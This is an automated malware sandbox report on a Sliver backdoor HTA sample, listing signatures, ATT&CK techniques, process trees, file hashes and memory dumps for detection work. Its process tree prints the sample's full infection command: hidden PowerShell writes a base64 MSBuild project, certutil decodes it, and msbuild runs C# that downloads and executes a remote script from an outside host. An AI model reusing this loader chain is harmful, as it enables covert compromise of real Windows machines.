sliver | 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2024 02:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta
Size

3KB
MD5

f46e78d3864aae68f2b8e83af27b9cf3
SHA1

51d75c93a4d06327f172d41c797ecc99a8ba309a
SHA256

3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3
SHA512

e714e39827ebe83e3c5e31bbd780d2909318a1bfaf2017476ee137b87ddf417ef0d0f933844c3140c2f276601658ad81e51718eb01286641504cdc0fb9d9662c

Score

10^/10

sliver backdoor defense_evasion discovery execution trojan

Malware Config

Signatures

Sliver RAT v2 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/408-93-0x00000198E74D0000-0x00000198E7F4B000-memory.dmp	SliverRAT_v2
behavioral2/memory/408-94-0x00000198E89D0000-0x00000198E94B4000-memory.dmp	SliverRAT_v2
behavioral2/memory/408-96-0x00000198E89D0000-0x00000198E94B4000-memory.dmp	SliverRAT_v2
behavioral2/memory/408-97-0x00000198E89D0000-0x00000198E94B4000-memory.dmp	SliverRAT_v2
behavioral2/memory/408-95-0x00000198E89D0000-0x00000198E94B4000-memory.dmp	SliverRAT_v2
behavioral2/memory/408-99-0x00000198E89D0000-0x00000198E94B4000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
2780	powershell.exe

Manipulates Digital Signatures 1 TTPs 3 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

Processes:

certutil.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION"	certutil.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	mshta.exe

Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

Processes:

certutil.exe

pid	Process
5108	certutil.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

mshta.exepowershell.execertutil.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exemsbuild.exe

pid	Process
2780	powershell.exe
2780	powershell.exe
408	msbuild.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exemsbuild.exe

description	pid	Process
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	408	msbuild.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

mshta.exepowershell.exemsbuild.execsc.execsc.execsc.exe

description	pid	Process	procid_target
PID 2960 wrote to memory of 2780	2960	mshta.exe	85
PID 2960 wrote to memory of 2780	2960	mshta.exe	85
PID 2960 wrote to memory of 2780	2960	mshta.exe	85
PID 2780 wrote to memory of 5108	2780	powershell.exe	88
PID 2780 wrote to memory of 5108	2780	powershell.exe	88
PID 2780 wrote to memory of 5108	2780	powershell.exe	88
PID 2780 wrote to memory of 408	2780	powershell.exe	89
PID 2780 wrote to memory of 408	2780	powershell.exe	89
PID 408 wrote to memory of 2356	408	msbuild.exe	92
PID 408 wrote to memory of 2356	408	msbuild.exe	92
PID 2356 wrote to memory of 3756	2356	csc.exe	93
PID 2356 wrote to memory of 3756	2356	csc.exe	93
PID 408 wrote to memory of 620	408	msbuild.exe	94
PID 408 wrote to memory of 620	408	msbuild.exe	94
PID 620 wrote to memory of 880	620	csc.exe	95
PID 620 wrote to memory of 880	620	csc.exe	95
PID 408 wrote to memory of 1992	408	msbuild.exe	98
PID 408 wrote to memory of 1992	408	msbuild.exe	98
PID 1992 wrote to memory of 2880	1992	csc.exe	99
PID 1992 wrote to memory of 2880	1992	csc.exe	99

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2960
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPg0KICA8IS0tIFRoaXMgaW5saW5lIHRhc2sgZXhlY3V0ZXMgYyMgY29kZS4gLS0+DQogIDwhLS0gQzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29yazY0XHY0LjAuMzAzMTlcbXNidWlsZC5leGUgcHNoZWxsLnhtbCAtLT4NCiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4NCiAgPCEtLSBMaWNlbnNlOiBCU0QgMy1DbGF1c2UgLS0+DQogIDxUYXJnZXQgTmFtZT0iSGVsbG8iPg0KICAgPEZyYWdtZW50RXhhbXBsZSAvPg0KICAgPENsYXNzRXhhbXBsZSAvPg0KICA8L1RhcmdldD4NCiAgPFVzaW5nVGFzaw0KICAgIFRhc2tOYW1lPSJGcmFnbWVudEV4YW1wbGUiDQogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSINCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4NCiAgICA8UGFyYW1ldGVyR3JvdXAvPg0KICAgIDxUYXNrPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtLklPIiAvPg0KICAgICAgPENvZGUgVHlwZT0iRnJhZ21lbnQiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICAgICAgICAgIENvbnNvbGUuV3JpdGVMaW5lKCJIZWxsbyBGcm9tIEZyYWdtZW50Iik7DQogICAgICAgIF1dPg0KICAgICAgPC9Db2RlPg0KICAgIDwvVGFzaz4NCiAgICA8L1VzaW5nVGFzaz4NCiAgICA8VXNpbmdUYXNrDQogICAgVGFza05hbWU9IkNsYXNzRXhhbXBsZSINCiAgICBUYXNrRmFjdG9yeT0iQ29kZVRhc2tGYWN0b3J5Ig0KICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPg0KICAgIDxUYXNrPg0KICAgICAgPFJlZmVyZW5jZSBJbmNsdWRlPSJTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uIiAvPg0KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICANCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbTsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOw0KICAgICAgICAgICAgLy9BZGQgRm9yIFBvd2VyU2hlbGwgSW52b2NhdGlvbg0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlRleHQ7DQogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOw0KICAgICAgICAgICAgdXNpbmcgTWljcm9zb2Z0LkJ1aWxkLlV0aWxpdGllczsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIHB1YmxpYyBjbGFzcyBDbGFzc0V4YW1wbGUgOiAgVGFzaywgSVRhc2sNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIFN0cmluZyBjbWQgPSBAIihOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vc2VjdXJlLmNsb3VkdGVjaG5vbG9naWVzdXNhLmNvbTo4MDgxL3VwZGF0ZS50eHQnKSB8IGlleCI7DQogICAgICAgICAgICBSdW5zcGFjZSBycyA9IFJ1bnNwYWNlRmFjdG9yeS5DcmVhdGVSdW5zcGFjZSgpOw0KICAgICAgICAgICAgcnMuT3BlbigpOw0KICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7DQogICAgICAgICAgICBwcy5SdW5zcGFjZSA9IHJzOw0KICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7DQogICAgICAgICAgICBwcy5JbnZva2UoKTsNCiAgICAgICAgICAgIHJzLkNsb3NlKCk7DQogICAgICAgICAgICByZXR1cm4gdHJ1ZTsNCiAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgDQogICAgICAgICAgICANCiANCiAgICAgICAgICAgIA0KICAgICAgICBdXT4NCiAgICAgIDwvQ29kZT4NCiAgICA8L1Rhc2s+DQogIDwvVXNpbmdUYXNrPg0KPC9Qcm9qZWN0Pg== > c:\windows\temp\enc3.txt;certutil -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\windows\temp\d.xml
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2780
- - C:\Windows\SysWOW64\certutil.exe
    "C:\Windows\system32\certutil.exe" -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml
    3⤵
    - Manipulates Digital Signatures
    - Deobfuscate/Decode Files or Information
    - System Location Discovery: System Language Discovery
    PID:5108
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe" C:\windows\temp\d.xml
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:408
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gstxboqt\gstxboqt.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2356
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D9E.tmp" "c:\Users\Admin\AppData\Local\Temp\gstxboqt\CSCE00BFF72D7664AF69788AFD696185D14.TMP"
        5⤵
        
        PID:3756
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zvxymoqo\zvxymoqo.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:620
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6E89.tmp" "c:\Users\Admin\AppData\Local\Temp\zvxymoqo\CSC25AF02AD52CF4D8B94EE6A92B03887EE.TMP"
        5⤵
        
        PID:880
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oiaydg3g\oiaydg3g.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1992
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7196.tmp" "c:\Users\Admin\AppData\Local\Temp\oiaydg3g\CSCD8E0469648454CA48B693F4F20AB42A2.TMP"
        5⤵
        
        PID:2880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES6D9E.tmp

Filesize
1KB

MD5
581b07e4bf9534cf46654c01f0473072

SHA1
853761080250b1788eeb0c11b217b69100bbe92f

SHA256
4c6ff3c68dba71799c46c674d2b692279b2def94acd42906a6b044829a77ef75

SHA512
4d97f0334c154b608a56d913a6351b28c81dfdbb15129e38d1fa122b0497e796a07f98657811bcba09b1fab19f09b7e4825a39bb58dfd35b69a3764f904655bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6E89.tmp

Filesize
1KB

MD5
ceb2f8e2ef1e140f3a8192f8288d370f

SHA1
1b05af53ae29e0cdc6d9f2186f91f94e540e3ecb

SHA256
f8994e14f5a9dd621607426c89d52ad97801bf0e6aa969b7fc1f8376bfcee170

SHA512
674c696326810545d0912609aef899f019e9a169839e38c2472278ebb66c94bf37446d4361b52c14d8971bb7894d6b7badb8fc0653e32c6bdde0c332dccba631

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7196.tmp

Filesize
1KB

MD5
d3d6715508aff9aaf3a9af18a46d3b3e

SHA1
438e1e7f48f909b01a8e0d2b45e7088e4ea3c597

SHA256
029089cf9b556af519e881cfe3d205b62814620364a5021d79f3da3b6045f8cf

SHA512
53f4a0f952f745fab78f589df9662e93d313083a13e58a6e8b746cf7ceea600a0c1dbacd1b9cf51c5f77940052a7c057f1c1119862562202377bc3d527bd7858

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j3wmh52w.apd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gstxboqt\gstxboqt.dll

Filesize
4KB

MD5
f6d05648bf7d44ba45bc199748566314

SHA1
8ae62d5e40f2be0c9451474e8b385cfd4d2f49a0

SHA256
132ad86e7d9df4f578c00f625b1f8aef8744e3a82b2cc9fc5e9b7a5979dcc487

SHA512
c5250eaf686c6de0495ada367a403831e58922545ca09c08dba8b62d829b61b3ea923b47f521981ad8c523cef7638bfc34deadb8c2c60e10bcd7d7ec817b6dc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\gstxboqt\gstxboqt.pdb

Filesize
11KB

MD5
c01a4183d5644e88298252052d9052ed

SHA1
c5ac4aed17b208985496c98acb04aa384e854791

SHA256
7592de542ec502a037e03ccb8bd915ab2e882eb7e43fdc1d5acd12917c740ba4

SHA512
d9150854eb94e1890c472aa137b5ee85a673aeae7eb7ac2b3f4356a1df221a0ccc22a2fc16edf2f688fa5230ce6eb27297e787c721cd069de22b16ccaea6a142

Download Submit
C:\Users\Admin\AppData\Local\Temp\oiaydg3g\oiaydg3g.dll

Filesize
3KB

MD5
d0c0d76869ab19056ab9790b4032d147

SHA1
394f8d478310149eb6129bc012646146c57f257d

SHA256
46a90e37fe32cf3cbbb41e2bc3d266a7e82c9c94b80f8255668319c55afc9104

SHA512
17d16c57f9e7352acc6854276c554b370b42989ebef1e4304d845f117b32d8b07164460d9ea1b139164144070be6010c151e89c3c1f7d9159ffad137868bf82c

Download Submit
C:\Users\Admin\AppData\Local\Temp\zvxymoqo\zvxymoqo.dll

Filesize
4KB

MD5
628c15da69547318f16ecf52f9040f1e

SHA1
395fa6dcdf12287e083f2ffffac7281390bbe0e3

SHA256
4a3e7db6afab63a3abc793490bb12566c66c12d468600483638248de824602cb

SHA512
ea30841bc718ba47295e1e5ef1b810c6dc8d3e4c556779d6fb3f91c5c1461c2c577d0e2ae488b4003de3ce15d00d77a280aa4c9fdac7c09a86e9e7caa51842fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\zvxymoqo\zvxymoqo.pdb

Filesize
11KB

MD5
aada54813034147ce8d2259bbe2a91d2

SHA1
82246f20afc8dd97b394b7db8169437914a9ca63

SHA256
fbeea46d857ec73255d05172a689e815aed207fb6e1b2c979c0417a85c8e33a0

SHA512
73a3a1049e9a682cd35316b48edc1a832943a16aa5bf3cfd25381f34d7f30677de6234c4c1ca1aad2345173146afa4c2a2e026e134fcb56e850264743c1ef6e2

Download Submit
C:\windows\temp\d.xml

Filesize
2KB

MD5
6c2a8d820d8d80182aacdc125399cd71

SHA1
51ccd1e0c3247bf24da813a1f660a367f8deefc8

SHA256
104291eb54874a1e80375b91ec552efac6632272654c8a5613730bd2eba9e78a

SHA512
c7c825a9b237850f6d087a449baaeed4e671db91b3db078586e322e992cb26efdb24d0ff8b365291ff58c3786dc563a62c4cbdcb81cecd95027606ef6fffd8c3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gstxboqt\CSCE00BFF72D7664AF69788AFD696185D14.TMP

Filesize
652B

MD5
e26744a9aa1b123d0cf962a6bed84ea0

SHA1
ba5ff9c78148f7b49a572727ad2e0f803674137c

SHA256
b84a9cca20ba67a01b6431afd70f21ff607a9ac682accb2222ab50d21a0a37ff

SHA512
b601a8c48ca3373fd63b93e18f6003ab6aeeb8281f83fe8e54eb3b88446e6fd27c525e12a5bd9263e11c06ad47cbf7939fb9acb2b358b404d5f200c2d7f1d1b8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gstxboqt\gstxboqt.0.cs

Filesize
1KB

MD5
4a4ff4a5e71cabe4864c862a697c1e27

SHA1
b95fb7438213c3ae9caf0e8b52bb301fefcddb56

SHA256
70e3eb02311312b3f1ff90617cb47ebb9b8e7cab47771668811a34584182c6bb

SHA512
7c9257e5f23e2c378f47cb3bdced440d07bf96575a10883e59e0a0b4d8834b0ab3a43e4b850f48e2538021d2b352d732fc93f81277bcc20c45b070dc56bdcff5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gstxboqt\gstxboqt.cmdline

Filesize
660B

MD5
2c123d8d6b0e261757321c3c24631ec9

SHA1
e493388caab394135003b268d257a04a3c46398a

SHA256
84bfc09de703b68fda3ac3746862e6c950368df4d6edeff9b74a7efa9187cc28

SHA512
c347b251d1c16ea4e9fc48ee249ee955dd99be00ef621ccf5f59a4dd38f9af38aca4d980274597b5ebec6efaa67f04550107a7f3cc736a4dbb10d8fe78a0b7f2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oiaydg3g\CSCD8E0469648454CA48B693F4F20AB42A2.TMP

Filesize
652B

MD5
2a8ef291fe271e5f63618cea93340f30

SHA1
409b95b3d8bcc59056934aa83aa557ea6ba8a0a2

SHA256
ff53d0f527949cfed8a4ff80a404a6df5b96294329ce5ebf90201166fe714926

SHA512
75f527df790c12c38bf4c754d5ec7d758c19a8c45cc24bf0892f549ac30dc578ec14f6989951446623debcfd071ebaa7f797f29762f23589b41ebe38074078bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oiaydg3g\oiaydg3g.0.cs

Filesize
611B

MD5
9dc0e32c32d7b3cfd2f819d8c0e4c7a5

SHA1
267cb8f96e02e298033786efd8ee6d87a73418a3

SHA256
67bc3e11493360528ba1296980ab818bf4c3938d14ddd6b5063bba03667b28ac

SHA512
c41e6c862933bed65c892b6cc89765a63ae936bdcb7a0499e0b1bd57d2a1d710dd66acb58fa7a7ffbef8a339fe647ccae85f6fdac3e7e7657472576a979a14b0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oiaydg3g\oiaydg3g.cmdline

Filesize
369B

MD5
4c7530d0eaab0215c1344af377ac1eb9

SHA1
01946081e34b0d0de489a0fec2eae5898f0eb44f

SHA256
c86eb175130b3371d9b107749e1dcf79e195e65df9a7a72d4ede746cf8151f01

SHA512
870f090e8e0a3636b297071d51502957424a89786a7730e963e60b1cfd9cdfd0f77a6502712be21a5cd882ba87759f07f9006d35b3821b2644f472f574adc46d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zvxymoqo\CSC25AF02AD52CF4D8B94EE6A92B03887EE.TMP

Filesize
652B

MD5
33b56617cce8f0255bf61fa2c46ecfb8

SHA1
54bb92291ec27a118c1a89a1eefe8ff5b928ba60

SHA256
bf9af33edfe4df2509f2dea73db7aad80a004dd447092b4aa4d582e645bf4009

SHA512
bfa6606ce236d3cf4966a9784325fa7edc96c626c14c978e91b37f676a77e7c7d6d5a2735e7fcc767aca33ea131c738e9f0e51b7846c85de4bda57b272711811

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zvxymoqo\zvxymoqo.0.cs

Filesize
1KB

MD5
da1f4b7b1a87cc475dfa05923b6301a0

SHA1
0e2ff764c519bc8169b66437857f01e25676e343

SHA256
624fe16b05ade5d9929c6ecf16857939230ea32156405c18b4dacfb0448e310e

SHA512
d09603fd0e641122cc99ccf6c53bb93db7df2b52ed1cdd44d3e73d963a3e9fd12eb1918477c043ba39e2ae123071f2df98b9180eb2a533c01bbdbaab2563b53b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zvxymoqo\zvxymoqo.cmdline

Filesize
801B

MD5
74e1e81b8e245e5353883ecd04473787

SHA1
f5977f6681ed5a75e88122baddde9a59d5de8686

SHA256
f9426a49283c4c35f279c90e83f3e8b89f9ee99f05723ed221858f32aa6503fb

SHA512
896d83b054a74f598c14bd420c9db8250cb43a531f420e5295d02309a9cc4326c7da9d816848f04f84b99eb3d137280134826d661aae153e3c0be256fb580033

Download Submit
\??\c:\windows\temp\enc3.txt

Filesize
6KB

MD5
940ed0fa0b1fc8ed6fbf279ab67af56f

SHA1
da4b7c40029542659f025ae74fa0be0fb0fa473c

SHA256
731673720695df22b838e0d256f7506eaa4c7570601db0a409302ab3a0cd1686

SHA512
934e3c5ee3b225ab0d686310a435865880b6c59f4885bb93cca814e8354456de3231364d3aa5cb6bc3c4472e6e6539da719c2b214e998e9e5773cca02f7d14ae

Download Submit
memory/408-32-0x00000198E4DF0000-0x00000198E4E34000-memory.dmp

Filesize
272KB

Download
memory/408-49-0x00000198CC240000-0x00000198CC248000-memory.dmp

Filesize
32KB

Download
memory/408-34-0x00000198E54A0000-0x00000198E5806000-memory.dmp

Filesize
3.4MB

Download
memory/408-31-0x00000198E4ED0000-0x00000198E4FF2000-memory.dmp

Filesize
1.1MB

Download
memory/408-99-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

Filesize
10.9MB

Download
memory/408-95-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

Filesize
10.9MB

Download
memory/408-97-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

Filesize
10.9MB

Download
memory/408-96-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

Filesize
10.9MB

Download
memory/408-94-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

Filesize
10.9MB

Download
memory/408-33-0x00000198E5130000-0x00000198E52AC000-memory.dmp

Filesize
1.5MB

Download
memory/408-26-0x00000198CA600000-0x00000198CA63E000-memory.dmp

Filesize
248KB

Download
memory/408-29-0x00000198CC260000-0x00000198CC290000-memory.dmp

Filesize
192KB

Download
memory/408-28-0x00000198E4C40000-0x00000198E4D9A000-memory.dmp

Filesize
1.4MB

Download
memory/408-27-0x00000198CAA00000-0x00000198CAA1A000-memory.dmp

Filesize
104KB

Download
memory/408-93-0x00000198E74D0000-0x00000198E7F4B000-memory.dmp

Filesize
10.5MB

Download
memory/408-89-0x00000198CC2B0000-0x00000198CC2B8000-memory.dmp

Filesize
32KB

Download
memory/408-65-0x00000198CC250000-0x00000198CC258000-memory.dmp

Filesize
32KB

Download
memory/408-76-0x00000198E74A0000-0x00000198E74C2000-memory.dmp

Filesize
136KB

Download
memory/2780-8-0x0000000005CC0000-0x0000000005D26000-memory.dmp

Filesize
408KB

Download
memory/2780-2-0x0000000074FEE000-0x0000000074FEF000-memory.dmp

Filesize
4KB

Download
memory/2780-5-0x0000000074FE0000-0x0000000075790000-memory.dmp

Filesize
7.7MB

Download
memory/2780-4-0x0000000005D80000-0x00000000063A8000-memory.dmp

Filesize
6.2MB

Download
memory/2780-3-0x00000000034A0000-0x00000000034D6000-memory.dmp

Filesize
216KB

Download
memory/2780-6-0x0000000005AB0000-0x0000000005AD2000-memory.dmp

Filesize
136KB

Download
memory/2780-91-0x0000000074FEE000-0x0000000074FEF000-memory.dmp

Filesize
4KB

Download
memory/2780-92-0x0000000074FE0000-0x0000000075790000-memory.dmp

Filesize
7.7MB

Download
memory/2780-7-0x0000000005C50000-0x0000000005CB6000-memory.dmp

Filesize
408KB

Download
memory/2780-18-0x0000000006540000-0x0000000006894000-memory.dmp

Filesize
3.3MB

Download
memory/2780-20-0x0000000006990000-0x00000000069DC000-memory.dmp

Filesize
304KB

Download
memory/2780-19-0x0000000006960000-0x000000000697E000-memory.dmp

Filesize
120KB

Download
memory/2780-21-0x00000000081B0000-0x000000000882A000-memory.dmp

Filesize
6.5MB

Download
memory/2780-22-0x0000000006E50000-0x0000000006E6A000-memory.dmp

Filesize
104KB

Download